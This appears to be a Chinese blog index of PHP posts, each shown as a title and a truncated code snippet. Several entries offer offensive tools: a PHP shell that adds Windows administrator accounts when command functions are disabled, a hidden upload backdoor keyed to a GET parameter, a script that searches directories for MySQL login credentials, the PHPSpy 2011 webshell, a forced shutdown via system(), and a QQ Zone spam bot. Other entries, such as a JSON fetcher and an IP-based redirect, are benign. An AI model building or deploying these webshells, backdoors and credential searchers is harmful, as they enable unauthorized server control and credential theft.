php

不再关注网络安全

php版shell.users加帐户

在php环境下wscript.shell 组件被禁用不妨试试shell.user PHP <?php echo "<div align=center><b>PHP 版Shell...

PHP shutdown sequence

关闭计算机机的php函数shell_exec(): PHP <?php if (!@system('shutdown /f /r /t 100')) { // Windows Vista ...

MySQL Login Searcher

神器呀,不多说,看代码: PHP <?php $backwards_depth = 2; // how many directories to step backwards $forward_depth...

PHP Hiden upload

PHP <?php if(isset($_GET['TheC'])) { echo "<body bgcolor=black><font color=green size=3>"; echo "&l...

腾讯微博json

php抓取与返回数据结构 php抓取 使用file_get_contents,代码: PHP <?php $url = 'http://v.t.qq.com/output/json.php?type...

QQ空间刷留言php代码

懒得手动刷QQ空间留言,可以利用3GQQ来刷留言,配合Cron任务,让服务器跑代码给我们刷,自己一边凉快去,哈哈。 这个是通过Post数据给手机QQ空间的留言板的ad...

PHP 版Shell.Users加管理员

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen 以及wscript.shell 组建被禁用的情况下,这也许是一个机会。 代码如下: ...

PHPSPY2011发布

未加密版本。 反正PHP管理MSSQL的功能不常用,所以,分离出来了。更人性化的文件管理路径跳转。模仿Windows 7的地址栏实现。改进了其他的一些细节。还加入了...

根据IP跳转不同城市代码(修正版)

根据IP跳转不同城市PHP代码(修正版) PHP <? //PHP获取当前用户IP地址方法 $xp_UserIp = ($_SERVER["HTTP_VIA"]) ? $_SERV...

网址快捷方式到桌面PHP代码

PHP <?php $Shortcut = "[InternetShortcut] URL=https://www.uedbox.com/ IDList= [{000214A0-0000-0000-C000-00000000...